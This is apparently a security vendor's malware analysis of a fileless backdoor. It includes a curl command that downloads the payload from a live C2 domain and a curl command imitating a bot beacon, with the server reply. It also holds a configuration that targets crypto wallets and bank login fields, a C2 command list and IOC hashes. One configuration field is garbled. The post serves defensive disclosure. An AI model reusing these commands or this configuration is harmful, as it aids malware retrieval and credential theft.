RANSOM WAR #1

There is a significant increase in ransomwares attacks, with many organizations hit by (almost) unknown threats, mixing APT technologies with improved offensive features.

Of course, after such an incident, companies should avoid paying the ransoms, and real backups could help in case of large incidents.  But let’s try to focus on a specific attack that is currently played on the Internet by stealth actors.

This article was created thanks to TEHTRIS SOC and TEHTRIS R&D teams. Of course, we are using TEHTRIS EDR to fight against these threats: enhanced detection & response against spying and sabotage operations.

Introduction

In this tiny article, we will examine a newly uncovered fileless APT that has been used by threat actors in the wild. As of today, all the related domains are still active. This is a live attack over Internet.

This backdoor is a multi-stage payload, where the last stage is a Python3 Reflective DLL embedding cython compiled modules. This last stage has been seen deployed through exe droppers, powershell commands.

Capabilities

As you can see from the “core” python module on the screenshot, the backdoor has various capabilities including:

  • Communication over :
    • Direct encrypted TCP connection
    • Twitter
    • I2p
    • Slack
    • Tor
    • DNS
    • Google
    • XMPP
  • AD recon via embedded SharpHound
  • Network scan
  • SMB pivoting
  • Command execution
  • Python code evaluation
  • Shellcode execution
  • Execution of other PE from memory
  • Credential harvesting via Mimikatz and LaZagne
  • Screen recording via ffmpeg
  • Keylogging
  • Local web MITM via a local proxy to intercept various websites like bitcoin exchanges and bank websites
  • Ransomware deployment
  • UAC bypass, privilege escalation and persistence via the WinPwnage project

At the time of writing, all those files can be downloaded directly from the C&C if you have a correct User-Agent and Referer.

Note that if you perform a malformed request before, with an unexpected URL, a wrong content-type, User-Agent or Referer, all your next requests will get 404 responses.

The following curl command can be used to download the python library archive and the PE payload :

curl -H 'User-Agent: Mozilla/4.0 (compatible; MSIE 2.1; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)' -H 'Referer: https://www.google.com' 'https://tedxns.com/api/get_file/c2b469a7-d628-4804-8cca-5b734c5c6b42' -o loot.7z

SHA256 or the archive: 01e8cf9c1390dfe2b486e7bdd12f01aeb634fbf4d88890435ee97da401810049

configuration

The malware configuration looks like the following

{

    {

        “domain_key_uri”: “/api/users”,

        “extra_beacon_port”: 50105,

        “hosts”: “benreat.com,tedxns.com,planlamaison.com,sarymar.com,teamchuan.com”,

        “knock_jitter”: 20,

        “knock_timeout”: 300,

        “knock_uri”: “/api/userlogin”,

        “logs_uri”: “/api/imageupload”,

        “post_log_fmt”: “type=post&name=%s&url=%s&user_agent=%s&process=%s&referer=%s&keylog=%s&data=%s”,

        “referer”: “https://www.google.com”,

        “secure”: 1,

        “user_agent”: “Mozilla/4.0 (compatible; MSIE 2.1; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)”,

        “zips_uri”: “/api/userdata”

    },

    “backdoor”: {

        “enabled”: 0

    },

    “dirs”: [

        “%APPDATA%\\Agama”,

        “%APPDATA%\\Armory”,

        “%APPDATA%\\B3-CoinV2”,

        “%APPDATA%\\BeerMoney”,

        “%APPDATA%\\Bitcloud”,

        “%APPDATA%\\Bitcoin”,

        “%APPDATA%\\BitcoinZ”,

        “%APPDATA%\\bitconnect”,

        “%APPDATA%\\Bither”,

        “%APPDATA%\\bitmonero”,

        “%APPDATA%\\BlocknetDX”,

        “%APPDATA%\\Cybroscoin”,

        “%APPDATA%\\Daedalus”,

        “%APPDATA%\\DashCore”,

        “%APPDATA%\\DeepOnion”,

        “%APPDATA%\\DigiByte”,

        “%APPDATA%\\Dogecoin”,

        “%APPDATA%\\ElectronCash”,

        “%APPDATA%\\Electrum”,

        “%APPDATA%\\Electrum-LTC”,

        “%APPDATA%\\Ember”,

        “%APPDATA%\\EmeraldWallet”,

        “%APPDATA%\\Ethereum Wallet”,

        “%APPDATA%\\Exodus”,

        “%APPDATA%\\FairCoin”,

        “%APPDATA%\\faircoin2”,

        “%APPDATA%\\Florincoin”,

        “%APPDATA%\\FORT”,

        “%APPDATA%\\GambitCoin”,

        “%APPDATA%\\GeyserCoin”,

        “%APPDATA%\\GreenCoinV2”,

        “%APPDATA%\\GridcoinResearch”,

        “%APPDATA%\\Gulden”,

        “%APPDATA%\\Hush”,

        “%APPDATA%\\IOTA Wallet”,

        “%APPDATA%\\Komodo”,

        “%APPDATA%\\Learncoin”,

        “%APPDATA%\\lisk-nano”,

        “%APPDATA%\\Litecoin”,

        “%APPDATA%\\Minexcoin”,

        “%APPDATA%\\mSIGNA_Bitcoin”,

        “%APPDATA%\\MultiBitHD”,

        “%APPDATA%\\MultiDoge”,

        “%APPDATA%\\Neon”,

        “%APPDATA%\\NXT”,

        “%APPDATA%\\Parity”,

        “%APPDATA%\\Particl”,

        “%APPDATA%\\Peercoin”,

        “%APPDATA%\\pink2”,

        “%APPDATA%\\PPCoin”,

        “%APPDATA%\\Qtum”,

        “%APPDATA%\\RainbowGoldCoin”,

        “%APPDATA%\\RoboForm”,

        “%APPDATA%\\StartCOIN-v2”,

        “%APPDATA%\\straks”,

        “%APPDATA%\\Stratis”,

        “%APPDATA%\\TREZOR Bridge”,

        “%APPDATA%\\TrumpCoinV2”,

        “%APPDATA%\\VeriCoin”,

        “%APPDATA%\\Verium”,

        “%APPDATA%\\Viacoin”,

        “%APPDATA%\\VivoCore”,

        “%APPDATA%\\Xeth”,

        “%APPDATA%\\Zcash”,

        “%APPDATA%\\ZcashParams”,

        “%APPDATA%\\Zetacoin”,

        “%APPDATA%\\StratisNode”,

        “%PROGRAMDATA%\\electroneum”,

        “%PROGRAMDATA%\\bitmonero”,

        “%LOCALAPPDATA%\\bisq”,

        “%LOCALAPPDATA%\\copay”,

        “%LOCALAPPDATA%\\programs\\zap-desktop”,

        “%LOCALAPPDATA%\\RippleAdminConsole”,

        “%LOCALAPPDATA%\\StellarWallet”,

        “%ALLDRIVESROOTS%\\Alliance”

    ],

    “dirs_keys”: [

        “coin”,

        “wallet”,

        “diebold”,

        “altaro”,

        “unitrends”,

        “wincor”,

        “magtek”,

        “payment”,

        “ncr”,

        “replication”,

        “bitmessage”,

        “veeam”,

        “backup”,

        “filemaker”,

        “back-up”,

        “swift”,

        “screenconnect”,

        “aldelo”,

        “bank”,

        “passw”,

        “avamar”,

        “htape”

    ],

    “ffmpeg”: {

        “command”: “ffmpeg.exe -f gdigrab -i desktop -pix_fmt yuv420p -threads 2 -c:v libvpx-vp9 -crf 40 -b:v 0 -speed 5”,

     I

out”: 60

    },

    “keylog”: {

        “date_format”: “%H:%M:%S-%d:%b:%Y”,

        “format”: “\n\n[%s (%s) – %s]\n”

    },

    “mitm”: {

        “enabled”: 1,

        “exclusion”: [

            “cc0141.bizsol.anser.ne.jp”,

            “wupos.westernunion”,

            “xpressmoney.biz”,

            “webpos.epayworldwide.com”,

            “cc.b-direct.saitamaresona.co.jp”,

            “cc0181.eb.shinwabank.co.jp”,

            “cc0001.b-web.mizuhobank.co.jp”,

            “maza.cc”,

            “light.webmoney.ru”,

            “light.wmtransfer.com”,

            “business24.cz”,

            “certificate.us.army.mil”

        ],

        “get_as_post_marker”: “&extra_flag_51783=”,

        “hr_marker”: “/automation_13111949/”,

        “post_log_limit”: 102400,

        “screens”: [

            “blvlva.secure.fundsxpress.com|passcode”,

            “cibng.ibanking-services.com/EamWeb/Remote/RemoteLoginAPI.aspx|_textBoxCompanyId,_textBoxUserId”,

            “cityntl.webcashmgmt.com/wcmfd/wcmpw/CustomerLogin|organizationid,userid,password”,

            “client.schwab.com/Login/SignOn/SignOn.ashx|txtPassword”,

            “connect.secure.wellsfargo.com/auth/login/do|j_password”,

            “express.53.com/portal/auth/login/Login|username,password”,

            “login.morganstanleyclientserv.com/msologin/handler/proxy/auth/authenticate|Userid,Password”,

            “.chase.com/auth/fcc/login|auth_userId,auth_passwd”,

            “onepass.regions.com/oaam_server/loginAuth.do|userid,pass”,

            “personal.vanguard.com/us/AuthenticationServiceServlet|USER,PASSWORD”,

            “secure.bankofamerica.com|onlineId,passcode”,

            “sellercentral-europe.amazon|email,password”,

            “sellercentral.amazon.com/ap/signin|email,password”,

            “www.security.us.hsbc.com/gsa/passwordAuth|username,password”,

            “www2.secure.hsbcnet.com/uims/portal/IDV_OTP_CHALLENGE|idv_OtpCredential”,

            “onlinebanking.mtb.com|UserId,Passcode”,

            “accounts.logme.in/login.aspx|email,password”,

            “www.gotomypc.com/users/login|UserId,Password”,

            “authentication.logmeininc.com/login|emailAddress,password”,

            “www.bitfinex.com/sessions|login,password”,

            “poloniex.com/login|username,password”,

            “www.coinbase.com/sessions|email,password”,

            “.fiservse.net|PrincipalID,PrincipalPWD”,

            “exchange.gemini.com/signin|email,password”,

            “www.binance.com/user/login.html|email,password”,

            “www.cryptopia.co.nz/Login|EmailAddress,Password”,

            “www.bittrex.com/Account/Login|UserName,Password”,

            “fxpayments.americanexpress.com/fxipfo/IPLogin.do|userName”,

            “cm.netteller.com/login2008/Authentication/Views/Login.aspx|IdTextBox”,

            “access.jpmorgan.com/prelogin|userID”,

            “my.electroneum.com/authenticate|my_pin”,

            “chsec.wellsfargo.com/login/login.fcc|PASSWORD”,

            “wexhealthcard.com/LoginPage.aspx|TextBoxUsername,TextBoxPassword”,

            “/Login|ctl00$Main$userNameBox,ctl00$Main$passwordBox”,

            “/ebc_ebc1961/|PWD=”,

            “signatureny.ebanking-services.com/EamWeb/account/login.aspx|textBoxCompanyId,textBoxUserId”,

            “businessbankingbdc.tdcommercialbanking.com|ConnectID,password”,

            “securentrycorp.nsbank.com|publicCred1”

        ],

        “sni_invalid_doman”: “cloudflare.com”

    },

    “nmc_api_url”: “https://api.opennicproject.org/geoip/?json&ipv=4”,

    “nmc_dns”: [

        “167.160.36.72”,

        “172.106.170.81”,

        “185.141.62.5”,

        “192.250.230.196”

    ],

    “registry”: [

        “SOFTWARE\\S.W.I.F.T.”,

        “SOFTWARE\\LogMeIn Ignition”,

        “SOFTWARE\\PyBitmessage”,

        “SOFTWARE\\Hex-Rays”,

        “SOFTWARE\\Whole Tomato”,

        “SOFTWARE\\WinLicense”,

        “SOFTWARE\\LogMeIn”,

        “SOFTWARE\\HexaD”,

        “SOFTWARE\\GitForWindows”,

        “SOFTWARE\\Cppcheck”,

        “SOFTWARE\\TortoiseSVN”,

        “SOFTWARE\\VisualSVN”,

        “SOFTWARE\\DASH”

    ],

    “screens”: {

        “count”: 10,

        “interval”: 4

    },

}

Botnet commands

When communication through https://evildomain/api/userlogin, the C&C server sends back its commands.

curl -v -H ‘User-Agent: Mozilla/4.0 (compatible; MSIE 2.1; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)’ -H ‘Referer: https://www.google.com’ -H ‘X-Name: SYSTEM!xxx!9255220’ -H ‘Content-Type: application/json’ –data ‘{“ffmpeg”: “0”, “uptime”: 765996, “rdp”: 3389, “name”: “SYSTEM!xxx!19255220’\””, “admin”: 1, “pid”: “1798”, “domain”: “xxx”, “dc”: false, “fileless”: true, “godmode”: false, “mimi”: true, “idle”: “0”, “version”: “2.999”, “il”: 16384, “botnet”: “5hsts”, “local_ips”: [“10.0.0.1”, “169.254.31.112”], “usb”: false, “wmi_av”: [“N/A”], “os_ver”: “2012 R2 Standard x64”, “gmt”: “+5”}’ https://teamchuan.com/api/userlogin

 

*   Trying 216.189.145.132…

> POST /api/userlogin HTTP/1.1

> Host: teamchuan.com

> Accept: */*

> User-Agent: Mozilla/4.0 (compatible; MSIE 2.1; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

> Referer: https://www.google.com

> X-Name: SYSTEM!xxx!9255220

> Content-Type: application/json

> Content-Length: 384

* upload completely sent off: 384 out of 384 bytes

< HTTP/1.1 200 OK

< Server: nginx/1.10.3

< Date: Wed, 06 Nov 2019 18:05:33 GMT

< Content-Type: text/html; charset=utf-8

< Content-Length: 37

< Connection: close

* Closing connection 0

!get_config[5dc314e79aadb35b95dc12a7]

The C&C is able to send the following commands to the agent :

  • !set_config
  • !get_config
  • !update
  • !update2
  • !update3
  • !get_keylog
  • !get_cookies
  • !get_sysinfo
  • !scan_lan
  • !scan_lan_ex
  • !webdav
  • !webdav_stop
  • !active_sk
  • !deactive_sk
  • !active_bc
  • !deactive_bc
  • !eval
  • !self_destruct
  • !get_screens
  • !mem_load
  • !shellcode
  • !get_passwords
  • !docfind
  • !filefind
  • !del_cookies
  • !export_certs
  • !del_keylog
  • !reboot
  • !check_soft
  • !install_ffmpeg
  • !record_video
  • !shell
  • !kill_lgmn_tokens
  • !get_lgmn_tokens
  • !sharphound
  • !bot_hashes
  • !mimi_32
  • !mimi_64
  • !mimi_grab
  • !get_kdbx
  • !research_domain
  • !research_full
  • !wipe_rdp_creds
  • !install_ffmpeg
  • !record_video
  • !shell
  • !kill_lgmn_tokens
  • !get_lgmn_tokens
  • !sharphound
  • !bot_hashes
  • !research_full

IOC

Evil domain names

benreat.com

tedxns.com

planlamaison.com

sarymar.com

teamchuan.com

SHA256

payload.bin: PE32 executable (console) Intel 80386, for MS Windows

8d2b3b0cbb32618b86ec362acd142177f5890917ae384cb58bd64f61255e9c7f  payload.bin

4531abf7bde9748238d67ce2d2592ffa4b3d92f1c26d3b0dc0d31c2a94750d10  core/__init__.pyx
7d3f2a69fedc96e7db784b41c624ed27d47d29a1366e1cf397acf37395561df4  core/active_host.pyx
739be19f4bea3f2b07a00a43562a31921b77eb823aa8a6e7786de20490c3e97d  core/backdoor.pyx
5dcb87316244655753f40bacefd312bbf5fd6011439bf88592af76e6022febc1  core/beacon.pyx
aee2c5796ef2fc5ddd4a9cffd8016962abef41ee846875687b5ec0d490baf5b4  core/commands.pyx
4687938257c3660f2eb6aedc55649c7feea43295817d7d41c9a09e3d370eda3c  core/conf/__init__.pyx
90114a4f4daea0add741a0c9980e2dd57558a5c657f2e757b9b15063820f2179  core/conf/config.pyx
e47aa497ded05487e8c6b5436cee1ed27e778c8fa725af4a721282673eca2247  core/debug.pyx
47ceddf0211f3c56763417ee8bc4a2842836e867563ddca63fd8bcd53877fa61  core/destruct.pyx
6bf179a1e30644cd8e784874a06a9c2f4b17f2f13768b88efb84da73967053f1  core/entry_point.pyx
1f0c47213ece02e937c3d3ddf2d49805b9e8a94df15e3a3dbe008206307e009a  core/initialize.pyx
375329be385ae0ec473b4a3cf75997474ae7a1c88b7f8819895053cbc0e54d2d  core/install.pyx
623efe6e9373be510f603b877dc17f4118a6f96e806c368bbc6a70068c98da83  core/ipc/__init__.pyx
655b19c68448d994069882780f649ca175f99e6a78f985ce4ba972751093c56b  core/ipc/exclude.pyx
353ed938ffc1ef2202e280a5a726e23c2f2c31f2f417894f953009a875c21f51  core/ipc/ipc.pyx
c5bed72f167dc448b64d6dcc07415107a1c7901e313a1276dd73969cfcc41a8a  core/ipc/mimikatz.pyx
a474fcb3a30b0559854181d6ccc877d6e19979f3603cd76f1b1310836c97c967  core/keylog.pyx
ceb1113a379fabcac5dd6a0ed4753a25d1e5ba64b40bd21228c33c3ae604e215  core/mitm/__init__.pyx
265dfe1fbc3f45e757c138b438fabce1d9b9f916dcdbe1137d01df908262e623  core/mitm/cert_gen.pyx
b4207413c32d77075840275f55c1890d31b12fc651fc1843c35cf346da76918f  core/mitm/proxy.pyx
3cea2ce3b5a474f99dc6b64bcd7cc142673cad7a62d2df135e2507b25c2ececa  core/mitm/web_dump.pyx
36c570634ec40cc7ac64eded4150aac501f82e522d056cc710ed6c8c3417bbd1  core/mitm/web_fakes.pyx
90372437ab312057adc898af37ff76d9e7c8ac70b490d809410b6e27bfee69cb  core/mitm/web_injects.pyx
ada601b76c322712320c0e0453b39071843eda4938732da9aa956931cc085f56  core/mitm/web_screens.pyx
3ff354e700da69e6e995db3087891ed417917101598f7ed12aad4d3d0b86f719  core/modules/__init__.pyx
74ee19b504657c153c560ed8acb5311fcbe35ffdbcc39db2b21eab3cf7436357  core/modules/aes_cfc.pyx
9e29abc3075bc7ec9571542b88bbb13a5d669e76ae2eb0bcc62885fc95a4cc48  core/modules/bot_lib.pyx
b2ddbcf874f76cdd38e4a9c85145b867cc47885b455b07c631c8244ae7627094  core/modules/cookies.pyx
26a3af1169b670c5ee51f42bb5fa0d0b317d126c237791b689d47ea3c4e271ad  core/modules/crc64.pyx
d445fac06801ba644a24c66df0ede20b0c9066d51f648ea8239e8d79e9aef26e  core/modules/decorators.pyx
77f09c1ccf40a398b5caf6ec2358308797d48ae22f39d88d7e03a0805e3f3607  core/modules/description.pyx
70f13d1c5fcd8e5f27ed46685e664e93632350f1bd58b8bebaeb6758fa552bad  core/modules/ffmpeg_inst.pyx
c67a8fb2a00f9c3c04ac9d464ce508e227d163510a76a89f7e0e69e725cbaa32  core/modules/ffmpeg_rec.pyx
6c413ecf5b460de72e7aaf735e44c4e2bd10de2a85c0b4dbd16e91d671d23758  core/modules/find_files.pyx
83d593313a8cca033911e064d9475c9ac92b0554c973a1d17c19de360102e095  core/modules/keepass.pyx
5219e05d3641963b083f28ed2ef3f6c0cdb01e415e2c33a87a1129da42163ac4  core/modules/lnk_file.pyx
5af01fa5e32f11669bc67fa8113506dc2432df2ca82c3e513fae38997642b0e9  core/modules/logmein.pyx
986049f1c88e6b9eeb64566a9fcbc8831968ce3fe5435d819e8e766d7bb895cb  core/modules/multipart.pyx
f4e182d2570a797a1f02cc8abb350e972a023a30a693c3da8bbf81d07ed78300  core/modules/os_ver.pyx
308ed512967f0bbb7ec433f96e14be97a94bd5af780e1f838f8cd2b4a54e4bb3  core/modules/rdp.pyx
4bb1163e033505fe023ac543624e753e970b741c0f1fb0e2e4160327f1e4bcdb  core/modules/rdp_creds.pyx
9a5f2b0e5b4fc200bdbd9df2ae6494815ed29f354cd968352c26ca8740db3094  core/modules/recent_files.pyx
35cf33f9b8e355998697c4d456492a6eb13f668c5e54610e67d88c7e266256d8  core/modules/research_domain.pyx
a8be9444cac2199ba4c0e76fb4a2db722a1964b83e3d23c01edcb3cc16e9b70e  core/modules/sharphound.pyx
90fc678fd48ab39c2c6ed1ded2f230b783be722e59b057a6a1b35e7cf4370643  core/modules/smb_scan.pyx
51d0ffde5c42c3d8cacec4fa08f34c8bc878b2baab73b63ca57003118de7755c  core/modules/socks5.pyx
8e027131385e792dbc51386b9a5bd8a15cf4c37ed01fd9601fa793efcf790818  core/modules/sysinfo.pyx
ed12e2dcf5edab4d06f406aeaac32b2396c37858e4855e95edc4f42b51a87939  core/modules/tools.pyx
cd729c01938c3710cb86202052a2a3ba935b89b180a97696d6de80fe32d89a57  core/modules/webdav.pyx
c896360f89d67e5c9d07b80e2eb55ddf10e87d712c0d1eec738b7b1abd0057b3  core/modules/winapi_stubs.pyx
1eaf77873973a557d213b9e8d03da699e404e5f8142ce3b6a9df1fd08fd6049c  core/modules/windnsquery.pyx
d4eefec1688466ec0b2f8e0abb46c2b47638ff59bce7edb7910509b33432de39  core/modules/winfiletime.pyx
9be34ea7d568c9d7cb9e6f7f91fdb223e7af23d9b60659dac90c6209723fb984  core/nmc.pyx
cb8facc3433ccf0f9322606f188018cc745284aae0e52a89972c06459f439612  core/obfuscate/__init__.pyx
ce55de9bab290101dcdb115e69a872b3cecc2152dfc3ff459f4f80f9fc843c03  core/obfuscate/boolean_obfuscator.pyx
12b96997f286194eec6594980584234110fde97c946f33a23e1c93e8addccfcd  core/obfuscate/number_obfuscator.pyx
56adb640179c4e9bd50e4154f97a5e44e563acdf904484d1a231afb8c4dd2a87  core/obfuscate/obfuscate.pyx
d771f8d58854448e89e2131d96af9ab4dfcfaae517ba77230f2d6107c74b1e77  core/obfuscate/string_obfuscator.pyx
63b8f9ff3e7af1a2a6c40f658a8eb833757f108199570670c6da9a83b032dc79  core/passwords.pyx
b357fb8a775ad0962b2e53e14eb2a89d8bcc1f10fd7845b52cbcf88d74783cfd  core/protect.pyx
9c983c52e92b3c3599357bb40a6d283221a9c92a8afa8ad9c4d452cb921c0ec5  core/pwnage.pyx
640dc2b8ba4fff5efe89b620b2ebcb5a1403506e9280f7212e396351e26a11b7  core/software.pyx
783cb3d3456e85d16ea345cf73cf02a4cd32d660de3ac5b1fabff80c674e1851  core/systems.pyx
184c31384b006a36d1005de329be9e1a7b668d103618b003f8bae358d9779438  core/transport/__init__.pyx
9da61c7e7ac4e45b883ce122615523f45c81b6d32b75fc45ec844a4e9b9a125c  core/transport/dns.pyx
29c42cd5b9bd1cb54b9b9bfd90ee81c4e2f53393914d7311e38c77240e7cba88  core/transport/github.pyx
3234cf3240d28e047ca3e1d3336047d34afe0d475f96e61bd45d4510d917e85f  core/transport/google.pyx
081890af7e5ee47375eacb7e241d914134f4193808f52e88236a5ced5ca88c2b  core/transport/i2p.pyx
f491ede7c5045ab8fa5354d2da045accf82e7e21c9d844b3a4cca2120690c5dd  core/transport/slack.pyx
c31cb2d01162d80cb56ffc29238c1998cbd63c5446a097b683e11690db95e1c7  core/transport/tcp.pyx
5acfbbb9cfb2edebe94ab82691ab99323496197a3767eebce0e642332de400bc  core/transport/tor.pyx
f0e51bb44cb89ae1b1679f1aabd7f1c573013a240b271c48bdea3cfaae283978  core/transport/twitter.pyx
1d1fdc714188972b1edd9c7967e3c2197537cc716467d53455097e2b2f7956fc  core/transport/udp.pyx
f27aed6b6e2b6581aedf091a124b58fb2a600b9c916f672c6ee4dd220051f26f  core/transport/xmpp.pyx
3b1cb6fc093fb9748d5d10cfd2f4a15bab182ef4859175783ea36e3586924c4e  core/tun/__init__.pyx
726e1006ce04771c5f80882f437b9fd81d35cd958e08be2549e6bafbafbb2407  core/tun/client.pyx
354d538393d13df0bc41fe56ab785ad4281e87bf6ed064a1b6f3c1d0e72c38e6  core/tun/util.pyx
9f9274ae4728a373c0777dcfcaf2f307b231ad3854a53ea7ccbc918e2d52c21e  core/usbmon.pyx
8d209793d5b937eeb2ad9b779d8128bcd29fe6b7d72c82ac6ead66dc8a916d22  core/zip_logs.pyx